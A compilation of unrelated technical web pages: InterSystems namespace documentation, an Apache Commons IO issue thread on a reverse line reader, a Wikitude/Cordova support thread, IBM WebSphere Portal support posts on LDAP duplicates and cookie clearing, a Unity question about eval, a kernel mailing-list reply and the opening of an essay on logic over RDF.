Enables you to modify and obtain information about the [Namespaces] section of the CPF. (Note that you usually perform this configuration via the Management Portal, as noted above.) The class also provides the List() class query. The class documentation includes examples and details.
Availability: %SYS namespace.

Enable you to define and use an installation manifest. Among other tasks, you can configure namespaces.
Availability: All namespaces.

Provides the EnableNamespace() method, which you can use to enable a namespace to work with InterSystems IRIS. This is useful if you create namespaces programmatically. Do not use this method to repair a damaged namespace. In the event of a damaged namespace, contact the InterSystems Worldwide Response Center (WRC) for assistance. Ignore all other methods in this class.
Availability: %SYS namespace.

Reminder

The special variable $SYSTEM is bound to the %SYSTEM package. This means that instead of ##class(%SYSTEM.class).method(), you can use $SYSTEM.class.method().
https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=ITECHREF_NAMESPACE
Details

Description

A reader that returns the lines of a file in reverse order, e.g.:

ReversedLinesFileReader reversedLinesFileReader = new ReversedLinesFileReader(file);
String line;
while ((line = reversedLinesFileReader.readLine()) != null) {
    // process the line
}
reversedLinesFileReader.close();

I believe this could be useful for other people as well!

Sorry, I didn't notice the radio buttons when I first uploaded... I will provide you with unit tests if you're interested - I tested the class with a main class and different input files, but it's easy to create them.

Attached simple maven project with java class and unit tests. @Gary: Let me know if you need anything more

Improved javadoc and unit tests. Fixed empty file bug.

I didn't really like the "inefficient" idea of using the BufferedReader to get around the encoding issue... so I read up about encodings in general and I think the solution as provided works for all one-byte encodings, UTF-8, UTF-16BE/UTF-16LE and Shift-JIS. For other encodings an exception is thrown at the moment, to be on the safe side (but this can be easily extended). Also, a lone \r is now treated as a newline as well.

PS: Added Apache headers and removed the author tag.

Good to know that it's easy to unambiguously detect CR and LF.
It would then be simple to have a directory of various different test files - read the file forward and store the lines; ensure that the reverse reader matches the reversed lines. The field totalBlockCount needs to be a long, not an int. Might simplify the code to use empty arrays rather than null. Sorry for the spurious files, i created the zip with the default utility in OS-X. I think the code addresses most of your questions already: - There are a few tests already (testXxxxSmallBlockSize()) that test the multi-block behaviour for lines that span a block (you can go down to a block size of 1 and it still works, that shows that the algorithm is solid I think) - I think it's clever to encode the newline characters - that way we automatically get the correct byte sequence for multi byte encodings (e.g. UTF-16) and if a one byte-per-char-encoding chose to use different bytes it would also work (performance is no issue for this as it happens only once) - I think about getNewLineMatchByteCount() to make it more efficient - although for the standard ISO case it ends up just being four byte comparisons instead of three. Should make almost no difference but on the pro side it makes the implementation nicely generic. - It's true, there is an issue with block-spanning newlines to be fixed. If a windows newline (\r\n) happens to span a block a wrong extra empty line will be returned. I'll provide a fix for the newline problem and will change totalBlockCount to long. Sorry, you're correct about needing to convert CR and LF. I was forgetting that BufferedReader.readLine() works on the decoded values, so does not need to encode them for comparison. Whereas your code works on bytes, and decodes later. AFAICT, the code depends on the line end byte arrays being sorted order of descending length. This should be documented. Hopefully it's not possible for an encoding to use different lengths for CR and LF! Eventually... there's a new version 0.3 attached. 
- The block-spanning newline issue is fixed
- Comment for the line-end-bytes array added
- The last-line-is-empty behaviour has been aligned with BufferedReader (and there is a test to check the "BufferedReader compliancy")
- The tests have been split up into two parametrized ones and one standard JUnit test.

ReversedLinesFileReader should be in the org.apache.commons.io.input package along with all the other InputStreams & Readers, so I have moved it. Also fixed some checkstyle issues (removed tabs, javadocs etc).

Works like a charm, thanks Georg. I had a similar requirement. I wanted to "chunk-wise" read a HDFS file backwards to allow file browsing similar to the Hadoop namenode's web interface. By clicking a button a user triggers a fetch of the previous N lines starting from a specific offset. With a few changes to your ReversedLinesFileReader implementation I was able to implement this functionality. I would suggest extending your ReversedLinesFileReader to be able to operate on InputStreams and to return the number of consumed bytes (i.e. the number of bytes actually read for "line construction", not the number of buffered bytes). This actually results in a reverse org.apache.hadoop.util.LineReader.

Great to hear that the class is being used already! Can you provide the exact SVN location of org.apache.hadoop.util.LineReader? I will try to create a base class for ReversedLinesFileReader that you could use then. Basically, it would be required to support:

Text str = new Text();
FSDataInputStream is = FileSystem.get(conf);
is.seek(offset);
ReversedLinesReader reader = new ReversedLinesReader(is);
int bytesConsumed;
long bytesConsumedTotal = 0L;
while (bytesConsumedTotal < threshold && (bytesConsumed = reader.readLine(str)) > 0) {
    //...
    bytesConsumedTotal += bytesConsumed;
}

public class ReversedLinesReader {
    public ReversedLinesReader(InputStream is) {
        // simply start reading from the (positioned) is
    }
    public ReversedLinesReader(File file) {
        // current behaviour: seek to end of file
    }
    public int readLine(Text text) {
        // return bytes read and store the line in text
        // alternatively one could return a Pair<String,Integer> to not depend on org.apache.hadoop.io.Text
    }
    public String readLine() {
        // current behaviour
    }
}

Version 2.2 has been released and addresses this issue.

Hi Georg, We cannot consider this for inclusion without:

Questions:
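The semantics being debated in this thread (reverse order; \n, \r\n and a lone \r as terminators; BufferedReader-compatible handling of a trailing newline) can be prototyped without any block logic. A deliberately simplified, stdlib-only sketch — whole file in memory and single-byte charsets only, so it sidesteps the block-spanning CRLF problem the real patch has to solve:

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.util.*;

public class ReverseLinesSketch {

    /**
     * Return the lines of a file in reverse order. Recognises \n, \r\n
     * and a lone \r; a trailing terminator does not yield an empty last
     * line, matching BufferedReader.readLine().
     */
    public static List<String> readLinesReversed(Path file) throws IOException {
        byte[] data = Files.readAllBytes(file);
        List<String> lines = new ArrayList<>();
        if (data.length == 0) {
            return lines;
        }
        int end = data.length;
        // Drop one trailing line terminator, if present.
        if (data[end - 1] == '\n') {
            end--;
            if (end > 0 && data[end - 1] == '\r') end--;
        } else if (data[end - 1] == '\r') {
            end--;
        }
        int lineEnd = end;          // exclusive end of the current line
        int i = end - 1;
        while (i >= 0) {
            if (data[i] == '\n' || data[i] == '\r') {
                lines.add(new String(data, i + 1, lineEnd - i - 1, StandardCharsets.ISO_8859_1));
                if (data[i] == '\n' && i > 0 && data[i - 1] == '\r') i--; // consume the CR of a CRLF pair
                lineEnd = i;
            }
            i--;
        }
        lines.add(new String(data, 0, lineEnd, StandardCharsets.ISO_8859_1));
        return lines;
    }
}
```

The cross-check suggested above — read the file forward, reverse, and compare with the backward reader's output — applies directly to this sketch too.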
https://issues.apache.org/jira/browse/IO-288
Hi, I found that it works fine with wikitude 6.0.0-3.4.0; I've just uploaded two screen recordings if that can help in finding my issue. The two versions run the same www/ folder. We have an 'onDeviceNotSupported' callback which is correctly executed on a device that is not compatible. cordova#7.1.0, android#7.1.1, wikitude 7.2.1-3.5.2: wikitude 6.0.0-3.4.0. Hope you can do something.

Hi Raphael, this was a known issue of SDK 7.0, but was fixed with 7.1. Please verify that the plugin version is 7.2.1. If you are sure that the version is correct, please try to use:

PackageManager.hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE)

This should return 'false' on the Wiko Tommy2.

Best Regards, Alex

Hi, back to this geo-AR project! I still have not been able to solve my issue. I double-checked the wikitude version: 7.2.1. I forgot to mention that I use the Cordova plugin, so I cannot figure out where I am supposed to insert the Java code from the post above. Thx for your help.

Hi, in the case of our Cordova sample app there is a MainActivity. In the onCreate of this Activity you should be able to use PackageManager.hasSystemFeature. Please check what this method returns on the Wiko Tommy 2 and report back.

Best Regards, Alex

Hi, thanks again for your help. In short, it looks like "PackageManager.hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE)" returns true for me. But the way I got this result was more complicated than I had planned; here is what I did:

I did not use the wikitude cordova sample app, so I pasted the line System.out.println(PackageManager.hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE)); into our own activity located in "platforms/android/src/our/package/name/MainActivity.java". The build failed with an error like: you can't call a non-static method from a static context.
After some research on the internet I came to modify this line a little, and our MainActivity became:

package our.package.name;

import android.os.Bundle;
import org.apache.cordova.*;
// I added this line too
import android.content.pm.PackageManager;

public class MainActivity extends CordovaActivity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        boolean hasGyro = this.getPackageManager()
            .hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE);
        System.out.println(" ##### hasGyro ? ##### " + hasGyro);

        // enable Cordova apps to be started in the background
        Bundle extras = getIntent().getExtras();
        if (extras != null && extras.getBoolean("cdvStartInBackground", false)) {
            moveTaskToBack(true);
        }

        // Set by <content src="index.html" /> in config.xml
        loadUrl(launchUrl);
    }
}

I then rebuilt, copied the apk onto my phone and started a shell with adb:

rafiki@rafiki: $ adb shell

then:

V3933AC:/ $ logcat | grep hasGyro

the result in the console:

05-09 12:12:56.423 16470 16470 I System.out: ##### hasGyro ? #####true

I did these operations with both wikitude 7.2.1 and 6.0.0, same output each time. Thanks in advance

raphael De Sede
https://support.wikitude.com/support/discussions/topics/5000086095
The Digital Experience team will be hosting a webcast for customers on Friday, February 24th, 2017, on the topic What is New in Digital Experience v9.0. Further details here.

Foreword

This blog entry is replicating a previous post in dwAnswers here: The dwAnswers post did not preserve formatting - this blog entry will.

Question/Issue

When I first installed the WebSphere Portal product, I chose the name "wpadmin" for my administrator name. The installer automatically created a group named "wpsadmins" for my administrator group. I recently added my LDAP configuration to the Portal server using a federated repository configuration. After doing so and restarting the Portal server, I am seeing the following in the logs:

CWWIM4538E Multiple principals were found for the 'wpadmin' principal name.

In a cluster - this also affects my Deployment Manager. How can I fix this error?

Explanation

When WebSphere Portal is first installed, it creates a user and group in a file on the filesystem, e.g. /opt/IBM/WebSphere/wp_profile/config/cells/DEVPortal/fileRegistry.xml

The full distinguished names of the user and group in this location, called the File Repository, are as follows:

uid=wpadmin,o=defaultWIMFileBasedRealm
cn=wpsadmins,o=defaultWIMFileBasedRealm

The enterprise LDAP contains a user and group with similar names, e.g.:

uid=wpadmin,cn=users,dc=ibm,dc=com
cn=wpsadmins,cn=groups,dc=ibm,dc=com

When an LDAP is added to the configuration, we now have two users named "wpadmin" when we try to login. WebSphere Portal / WebSphere Application Server does not - by design - support duplicate user names on login with a federated repositories configuration, and does not attempt to resolve them.

Let's take another example. Suppose we had "twcornwe" the mail intern and "twcornwe" the CEO of the company. We would not want "twcornwe" the mail intern to log in and suddenly get all the access/permissions that "twcornwe" the CEO has.
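The failure mode behind CWWIM4538E is simple to model: a short-name lookup across two federated repositories returns more than one distinguished name. A toy sketch of that ambiguity check — class name, DN parsing and sample data are invented purely for illustration, not how WIM actually implements it:

```java
import java.util.*;

public class PrincipalLookup {

    /** Return all DNs whose leftmost RDN value matches the given login name. */
    public static List<String> findPrincipals(List<String> dns, String loginName) {
        List<String> matches = new ArrayList<>();
        for (String dn : dns) {
            String firstRdn = dn.split(",", 2)[0];      // e.g. "uid=wpadmin"
            String value = firstRdn.split("=", 2)[1];   // e.g. "wpadmin"
            if (value.equalsIgnoreCase(loginName)) {
                matches.add(dn);
            }
        }
        return matches;
    }
}
```

With both the file-registry DN and the LDAP DN present, a login as "wpadmin" finds two principals, which is exactly the ambiguity the server refuses to resolve.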
Most LDAPs do not permit duplicate loginIDs to ensure this scenario does not occur. The same principles / philosophy apply with WAS/Portal: duplicate usernames are not permitted.

Removing the LDAP from Portal configuration

At the end of the day - you should not have to change your LDAP data to work with WebSphere Portal. The following solution will describe how to modify ONLY the WebSphere Portal configuration to remove the duplicates. The solution assumes this is a new system being configured where the LDAP was just added and created a conflict. The solution below should NOT be applied to a running production system - contact IBM Support via a new PMR if a running production system is impacted. The solution detailed will also assume a clustered configuration. The EXACT same steps may be performed on a standalone Portal server as well - the only difference being to modify the files directly on the Portal server under wp_profile, rather than modifying the dmgr_profile file in a cluster.

0) The following steps will manually "undo" most of the LDAP configuration steps. We will re-add the LDAP in a later step.

1) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/wim/config/wimconfig.xml - the name= on your LDAP may vary slightly.

2) Open this file in a text editor.

3) Modify this as follows - removing the final line:

<config:realmConfiguration
<config:realms
<config:participatingBaseEntries

4) Save changes.

5) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/clusters/PortalCluster/resources.xml

6) Open this file in a text editor. Change all instances of the following:

from: uid=wpadmin,cn=users,dc=ibm,dc=com
to: uid=wpadmin,o=defaultWIMFileBasedRealm

Note - if you did not change your Portal administrator to be the LDAP user in ConfigWizard or via wp-change-portal-admin-user, this step will not be required.
7) Change all instances of the following:

from: cn=wpsadmins,cn=groups,dc=ibm,dc=com
to: cn=wpsadmins,o=defaultWIMFileBasedRealm

8) Save changes.

9) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/security.xml

10) Open this file in a text editor. Locate the line which begins with: <userRegistries xmi:type="security:WIMUserRegistry"

11) Change the primaryAdminId= property on this line to the following: primaryAdminId="uid=wpadmin,o=defaultWIMFileBasedRealm"

Note - if you did not change your WAS administrator to be the LDAP user in ConfigWizard or via wp-change-was-admin-user, this step will not be required.

12) Save changes.

13) Restart your Deployment Manager. Verify you can login to the DMGR with the wpadmin user located in the file repository (i.e. the one you specified when installing WebSphere Portal).

14) Stop the nodeagent(s) and Portal server(s) if running. Kill the process IDs if you cannot stop via stopNode/stopServer.

15) Run a manual syncNode.sh from the wp_profile/bin directory, e.g. ./syncNode.sh mydmgr.ibm.com 8879 -user wpadmin -password password

16) Portal 7.0+8.0 (skip in 8.5 and later): Modify the following file: /opt/IBM/WebSphere/wp_profile/PortalServer/jcr/lib/com/ibm/icm/icm.properties updating the following parameter in the file: jcr.admin.uniqueName=uid=wpadmin,o=defaultWIMFileBasedRealm

17) Start the nodeagent and Portal server. Verify you can login to Portal. There may be some errors present in SystemOut.log at this point - that's OK, we'll fix those shortly.

Removing the Duplicates

1) Login to the Deployment Manager / WAS admin console
2) Left-hand side, Manage Users.
3) Create a new user, name it wpadminFILE or similar
4) Left-hand side, Manage Groups
5) Create a new group, name it wpsadminsFILE or similar.
6) Add the newly created user to the newly created group.
7) Run a manual syncNode.sh from wp_profile/bin, e.g.
./syncNode.sh mydmgr.ibm.com 8879 -user wpadmin -password password

8) Run the following Portal configuration task: ./ConfigEngine.sh wp-change-was-admin-user -DWasUserid=uid=wpadmin,o=defaultWIMFileBasedRealm -DWasPassword=password -DnewAdminId=uid=wpadminFILE,o=defaultWIMFileBasedRealm -DnewAdminPw=newpassword

*Note: The -DWasPassword will be the wpadmin password in the file repository / out of the box install.

9) Restart the DMGR. Verify you can login as the new wpadminFILE user.
10) Left-hand side, Manage Users.
11) Delete the wpadmin user. KEEP the wpadminFILE user.
12) Left-hand side, Manage Groups.
13) Delete the wpsadmins group. KEEP the wpsadminsFILE group.
14) Run the following Portal configuration task: ./ConfigEngine.sh wp-change-portal-admin-user -DWasPassword=password -DnewAdminId=uid=wpadminFILE,o=defaultWIMFileBasedRealm -DnewAdminPw=newpassword -DnewAdminGroupId=cn=wpsadminsFILE,o=defaultWIMFileBasedRealm
15) Restart the nodeagent.
16) Sync nodes.
17) Portal 7.0+8.0 secondary nodes only (skip in 8.5 and later) - run the following configuration task: ./ConfigEngine.sh update-jcr-admin
18) Restart the Portal server.

Putting back the LDAP

At this point, we now have a Portal system configured with the following user and group:

uid=wpadminFILE,o=defaultWIMFileBasedRealm
cn=wpsadminsFILE,o=defaultWIMFileBasedRealm

which will avoid the duplicates once we re-add the LDAP.

1) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/wim/config/wimconfig.xml
2) Open this file in a text editor.
3) Modify this as follows - re-adding the final line that we removed previously. - your name= on your LDAP may vary slightly.
4) Save changes. Sync nodes.
5) Restart the DMGR, nodeagent(s) and Portal server(s).

Note: At this point, the CWWIM4538E error should no longer occur given we had removed the duplicates.

6) If you intended for your WAS administrator to reside in the LDAP - run the following Portal configuration task: ./ConfigEngine.sh wp-change-was-admin-user -DWasPassword=password -DnewAdminId=uid=wpadmin,cn=users,dc=ibm,dc=com -DnewAdminPw=newpassword
7) Sync nodes.
Restart the DMGR, nodeagent(s) and Portal server(s).

8) If you intended for your Portal administrator to reside in the LDAP - run the following Portal configuration task: ./ConfigEngine.sh wp-change-portal-admin-user -DWasPassword=password -DnewAdminId=uid=wpadmin,cn=users,dc=ibm,dc=com -DnewAdminPw=newpassword -DnewAdminGroupId=cn=wpsadmins,cn=groups,dc=ibm,dc=com
9) Sync nodes. Restart the Portal server(s).
10) Done!

Closing Thoughts

If you are able to avoid the duplicate usernames when installing the product by choosing a username that does not reside in the LDAP - that will save a LOT of headaches / make the steps above unnecessary. However, there are situations where it is not always possible to know what LDAP data may exist - in which case the steps above will help get your system to a working configuration without modifying any data in the LDAP itself.

IBM Support will be hosting a webcast for customers on Wednesday, November 2nd, 2016, on the topic Best Practices for Staging to Production in WebSphere Portal 8.5. Further details here.

Introduction

WebSphere Portal end users can run into situations where cookies in the web browser are not always cleaned up properly. It can be helpful to have code available which can remove cookies automatically and transparently to the end user. In earlier versions of WebSphere Portal, this was accomplished through a quick bit of javascript code, often enabled in a custom theme. With WebSphere Portal v8 and newer, the HttpOnly attribute is set on cookies, which prevents javascript code from cleaning up the cookies. Removing the HttpOnly attribute from the cookie is not recommended, as you leave your end users open to possible cross-site scripting attacks.

This article will explore an alternative method to clearing out cookies - use of a portlet on a WebSphere Portal page. The code performs two functions:

1) Clear out the JSESSIONID, LtpaToken, and LtpaToken2 cookies if present in the web browser.
2) Redirect the user to a different location once the cookies are cleared

This article will also discuss setting up a page in WebSphere Portal where the portlet can be deployed; however, the page will not be visible to end users. A download link is available at the end of the article with sample code and a sample page in WebSphere Portal.

Setting up the Portlet

IBM Rational® Application Developer for WebSphere® Software v8.0.4 was used to develop this portlet. However, any software which can create a JSR286 portlet with two-phase rendering capabilities can be used to author the necessary code. Instructions will be detailed specific to Rational Application Developer.

1) Create a new portlet project. I called mine "cookieeater".

2) Select a target runtime of WebSphere Portal 7.0 stub or later. Do not add a project to an EAR. Select JSR286-Basic API with Basic Portlet type. Do not enable Web 2.0 Features. Optionally, you may add an action listener; however, it is not required for the code in the portlet.

3) Open the portlet descriptor. Add a container runtime option of javax.portlet.renderHeaders with value true.

4) Open the portlet descriptor. Update the default namespace to a value of your choice.

*Note: My end result in portlet.xml for steps #3-#4 looked like

<portlet-app>
...
<portlet>
...
</portlet>
<default-namespace>#default</default-namespace>
<container-runtime-option>
<name>javax.portlet.renderHeaders</name>
<value>true</value>
</container-runtime-option>
</portlet-app>

5) Open the jsp file under your WebContent folder. Add the following snippet of javascript code:

<script type="text/javascript">
<!--
window.location = ""
//-->
</script>

*Note: Modify this location to the actual location you wish to send end users after cookies are cleared out. e.g.

6) Open the java source code for your portlet. Add the following two constants:

final String PATH = "/";
final String DOMAIN = "";

*Note: Modify these two constants specific to your configuration.
7) Add the following method to the source code:

public void doHeaders(RenderRequest request, RenderResponse response)

8) Within the doHeaders method is where the cookie clearing logic occurs. My code looked like the following:

Cookie[] cookies = request.getCookies();
if (cookies != null) {
    for (Cookie cookie : cookies) {
        if (cookie.getName().equals("JSESSIONID")
                || cookie.getName().equals("LtpaToken")
                || cookie.getName().equals("LtpaToken2")) {
            cookie.setPath(PATH);
            cookie.setDomain(DOMAIN);
            cookie.setMaxAge(0);
            cookie.setValue("");
            response.addProperty(cookie);
        }
    }
}

*Author's note: Removing the cookies does NOT perform a logout from WebSphere Portal! Do NOT use this code as a substitute for logging out.

9) Export your code to a WAR file.

10) Done with coding! Let's set up our Portal page with this portlet now.

1) Deploy your cookieeater.war file via the "Web Modules" portlet

*Author's note: I'm not sure why, but the web.xml file for my portlet contained the stanza <welcome-file-list> repeated multiple times. Portlet deployment initially failed as a result for me. Manually cleaning up the web.xml file so only a single <welcome-file-list> stanza existed resolved the issue.

2) Create a new page in WebSphere Portal either via the Manage Pages portlet, or via Edit Mode. I called my page "eatme" and created it under the "Home" label. Give it a friendly URL of "eatme".

3) Add the cookieeater portlet to the page using either the Edit Page Layout portlet in Manage Pages, or via Edit Mode.

4) Navigate back to your Home label in your theme. You should now notice a page called "eatme".

5) Click the "eatme" page.
- Your JSESSIONID, LtpaToken and LtpaToken2 cookies should be cleared out.
- You should be redirected to the site specified in the javascript of your jsp.

At this point, while the "eatme" page accomplishes 2 of 3 of our end goals, it's sitting out there in plain sight of end users.
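The name-matching and max-age-zeroing at the heart of doHeaders can be exercised outside any portlet container. A framework-free sketch — CookieStub is a hypothetical stand-in for the real Cookie class, used here only so the filtering logic is testable in isolation:

```java
import java.util.*;

public class CookieClearing {

    /** Hypothetical stand-in for javax.servlet.http.Cookie. */
    public static class CookieStub {
        public final String name;
        public String value;
        public String path;
        public String domain;
        public int maxAge = -1; // -1 = session cookie; 0 tells the browser to delete it
        public CookieStub(String name, String value) {
            this.name = name;
            this.value = value;
        }
    }

    private static final Set<String> AUTH_COOKIES =
            new HashSet<>(Arrays.asList("JSESSIONID", "LtpaToken", "LtpaToken2"));

    /** Return the cookies that matched, each configured for deletion. */
    public static List<CookieStub> expireAuthCookies(CookieStub[] cookies,
                                                     String path, String domain) {
        List<CookieStub> toExpire = new ArrayList<>();
        if (cookies == null) return toExpire;
        for (CookieStub c : cookies) {
            if (AUTH_COOKIES.contains(c.name)) {
                c.path = path;     // must match the original cookie's path
                c.domain = domain; // and domain, or the browser keeps it
                c.maxAge = 0;      // max-age 0 expires the cookie
                c.value = "";
                toExpire.add(c);
            }
        }
        return toExpire;
    }
}
```

The design point is the same as in the portlet: the cookie is not deleted server-side; the response merely re-sends it with a matching path/domain and a max-age of zero, and the browser drops it.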
Any user who happens to click on the page will have their cookies removed and will be forced to log in to Portal again. Not good. Next steps are to hide this page.

6) Navigate back to your WebSphere Portal. Log back in as an Administrator.
7) Navigate to the Manage Pages portlet. Click the 4th icon to "export" the page.
8) Open the exported page.xml file. Locate the following two lines:

</pagecontents>
<parameter name="com.ibm.portal.IgnoreAccessControlInCaches" type="string" update="set"><![CDATA[false]]></parameter>

9) Update to the following, adding the new parameter "com.ibm.portal.Hidden" with value "true".

</pagecontents>
<parameter name="com.ibm.portal.Hidden" type="string" update="set"><![CDATA[true]]></parameter>
<parameter name="com.ibm.portal.IgnoreAccessControlInCaches" type="string" update="set"><![CDATA[false]]></parameter>

10) Save changes.
11) Navigate to the Import XML portlet in the Administration area.
12) Import the updated page.xml with the new page parameter added.

*Author's note: Any page parameters that begin with com.ibm.portal.* cannot be set via the GUI. The only means to set them is through XMLAccess scripting.

13) The "eatme" page should no longer be visible within your Portal site.
14) Test the friendly URL of the page, e.g.
15) Your cookies should be removed and you should be redirected to the site specified in the javascript of your jsp.
16) (Optional): Set anonymous permissions on the page and portlet.
17) Enjoy! Feel free to implement and modify for your own specific Portal site. You should be able to send users to this friendly URL as needed within your Portal site to clear out cookies.

Sample End Result Portlet and Page:

This applies to custom themes in Portal 8 that are based on a Page Builder theme migrated from Portal 7. Users may notice strange behaviour with some of the icons in the Search Center.
The most obvious one will be a magnifier glass next to searchbox dialog or button even when the search query and returned results are otherwise functional. These weird multiple icons behavior are caused by a missing css class called wpthemeAltText This specific style/class is not included in Portal 8 by default. So use may have to account for the by including it in their custom css. Here will be a sampel entry .wpthemeAltText { display: none; } Notes: In portal 8 the applicable style at the location is lotusAltText. So for example Searchbox.html in <profile root>\installedApps\dev01\PA_Search_Center.ear\searchCenter.war\js\ibm\portal\search\SearchCenter\templates will have following entry in default Portal 8 theme <span class="lotusAltText">${resourceBundle.searchAltText}</span> In Pagebuilder themes from Portal 7 here is the equivalent entry <span class="wpthemeAltText">${resourceBundle.searchAltText}</span> You therefore basically have to account for it in Portal 8 as described above OR change the line to match what is already in portal 8. While a rare scenario, allowing the history log for wcm content items could cause problems in saving the item and or the log itself. This happen if grows past the internal default size.. typical errors will look similar to this Error rendering content: com.ibm.workplace.wcm.api.exceptions.DocumentSaveException:XXXX/jcr:versionedNode/icm: copiedValues exceeds its max length. The max length is 5000000 while the value is of length 5000679 XXX/jcr:versionedNode/icm:copiedValues exceeds its max length. 
The max length is 5000000 while the value is of length 5000679)

As part of routine maintenance you may consider truncating the history log.

Customers may notice that WCM attachment and file resources show no errors during conversion, but the documents do not exist in the collection/index. Enabling DCS debug shows successful conversion but also shows the following message for each attempted conversion: "DCS returned an empty string for document"

[7/25/13 17:37:56:986 EDT] 0000002d ApplicationDo 1 DCS returned an empty string for document

Often this is because the wrong version of the RemoteDCS.zip is in use. There is a new RemoteDCS.zip for each 8.0.0.x CF0X released; essentially each CF has its own files. Please open a PMR and contact IBM support if it is not clear you are using the correct files for the CF in use.
https://www.ibm.com/developerworks/mydeveloperworks/blogs/PortalL2Thoughts?maxresults=50&sortby=0&lang=pt_br
I want to write a function that is then called by the program thousands of times to make your own mesh world for users to roam in. eval() is great; I have used it to print maths and text, and also to call a function. For my game, though, I don't need to actively call an action. I need users to write a bit of maths that will then become a function, which the program will then call many times. I.e., the .JS function is:

function equation(x:float,y:float,z:float):float { return (x*x+y*y+z*z-1); }

Users can replace / rewrite the above function so that:

GUI Text: function equation(x:float,y:float,z:float):float { return (Mathf.Sin (x)*Mathf.Cos (y)+z*z-5); }

Is it possible? It's a bit confusing. At the moment I am calling the same eval() thousands of times, and it's twice as slow as calling the maths from a function, so if there is any way of calling eval() just once to write a function I would love to know about it!

Answer by Loius · May 11, 2013 at 04:23 AM

If you use Reflection you can get an actual function from its name; depending on how much you trust your user, you may need to be creative and, for instance, only allow methods from Mathf to be called. See the answer here for how to use a string to find and call a function.

this one causes an error:

var st = "function test(){print(1234);}"; var myfunction: Function=eval(st);

Assets/Plugins/CreateWorld.js(102,39): BCE0031: Language feature not implemented: BuiltinFunction: Custom.

the answer I linked you to is aggressively avoiding the use of eval; the whole point is to not use eval.

something like this (meaning if you copy and paste this it will not work, it needs changes to fit in your code):

var t : Type = Type.GetType("Mathf");
var method : MethodInfo = t.GetMethod(userFunctionName, BindingFlags.Static | BindingFlags.Public);
method.Invoke(null, arguments);

ok sounds good, I'll make a study of it ;) thank you so much!
this line works: var t : System.Type = System.Type.GetType("Mathf"); but I also have to say MethodInfo doesn't exist in .JS, so does that mean it doesn't support reflection at all?

Eval is the only way to let the user execute arbitrary code, but you never want the user to execute arbitrary code, because someone will call Game.Win. For something complex like that, without eval, you have to keep a list of functions the user wants to call and then call them in order. It's not a simple problem, but you can do it through Reflection, or you can just have a list of options they can use and let them order them however they want.

Answer by aldonaletto · May 11, 2013 at 03:56 PM

Maybe this article can help you. At first sight, it shows how to compile some code at runtime, and how to use the resulting assembly.

Thank you Aldo, that is pretty difficult. It seems there is a CreateMethod class with eval(), and I don't understand the article so much; it is very advanced. Perhaps I should not try to turn a string into a method in JS, and instead find an example in C# that I could call from JS. Oh, Loius just put up some code for me to try; I will be trying to understand that!

Probably I would have to write an external DLL. It's a shame, because I have a great program and I wanted to run some competitions to see who can write the most crazy-looking procedural 3D functions, but it runs over twice as slow from the web.
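The performance idea at the heart of this question (evaluate the user's string once to build a function, then call the resulting function thousands of times) can be sketched outside Unity too. The following is a hypothetical illustration in Python rather than UnityScript; the formula text and whitelist are stand-ins, not anything from the thread.

```python
import math

# User-supplied formula text (only the expression body, not a full function).
user_formula = "math.sin(x) * math.cos(y) + z * z - 5"

# Build the function ONCE. Restricting globals to a whitelist keeps the
# user from calling arbitrary code (the "Game.Win" problem noted above).
allowed = {"__builtins__": {}, "math": math}
equation = eval("lambda x, y, z: " + user_formula, allowed)

# The compiled function can now be called thousands of times cheaply,
# without re-parsing the string on every call.
def sample_grid(n):
    total = 0.0
    for i in range(n):
        total += equation(i * 0.1, i * 0.2, i * 0.3)
    return total

print(equation(0.0, 0.0, 0.0))  # -> -5.0
```

The key point is that the string is parsed exactly once; every subsequent call pays only a normal function-call cost, which matches the asker's observation that a pre-built function runs about twice as fast as repeated eval().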
https://answers.unity.com/questions/453591/difficult-eval-task-write-a-function-but-dont-invo.html
>> In short, I don't think it's better to have task-counting and fd-counting in memcg.
>> It's kmem, but it's more than that, I think.
>> Please provide subsys like ulimit.
>
> So, you think that while kmem would be enough to prevent fork-bombs,
> it would still make sense to limit in more traditional ways
> (i.e. ulimit-style object limits). Hmmm....

I personally think this is namespaces business, not cgroups. If you have a process namespace, an interface that works to limit the number of processes should keep working given the constraints you are given. What doesn't make sense is to create a *new* interface to limit something that doesn't really need to be limited, just because you limited a similar resource before.
http://lkml.org/lkml/2012/4/17/346
Status: Personal ramblings, unfinished in many places. Abandon requirements for consistency all ye who enter in. Created: 1999/06/18

This document was an attempt to build logical formulae as closely as possible on top of the RDF triple abstract syntax. Another more recent investigation in this direction is Notation3. It investigates using XML for logic.

In this document: inclusion (include, assert, truth); an example of a trust statement; quantification (for all, exists).

The XML syntax [] and the RDF model [] give the basics for semantics of the Web, but it seems to me we need some connective tissue to work toward the semantic web. Basically, everything we think of as "data" on the Web forms a set of logical statements. We need a unifying logical language for data, for the machine interfaces to data systems, in the same way that HTML was a unifying language for human interfaces to information systems. This document is an attempt at an existence proof to reassure one that the XML/RDF model will be able to meet a number of requirements which have been proposed in the community.

The need, of course, is to build a logic out of RDF, as naturally as possible. We fail if the syntax becomes dramatically more cumbersome as we add features; we win if we find that higher-order statements look like natural XML just as simple metadata assertions do. We fail if at every stage we have introduced special XML syntax whose semantics are expressed in English; we win if we find that we can build up the language by introducing new RDF properties, especially those whose semantics can be expressed in RDF and the preceding properties. (Within this document, XML elements with a namespace prefix are assumed to be defined as pointing to something the reader can figure out, and unprefixed element names are used for new features which are introduced in this document.) I assume for the purposes of this paper a syntax for data in XML which is now described in a separate note on syntax.
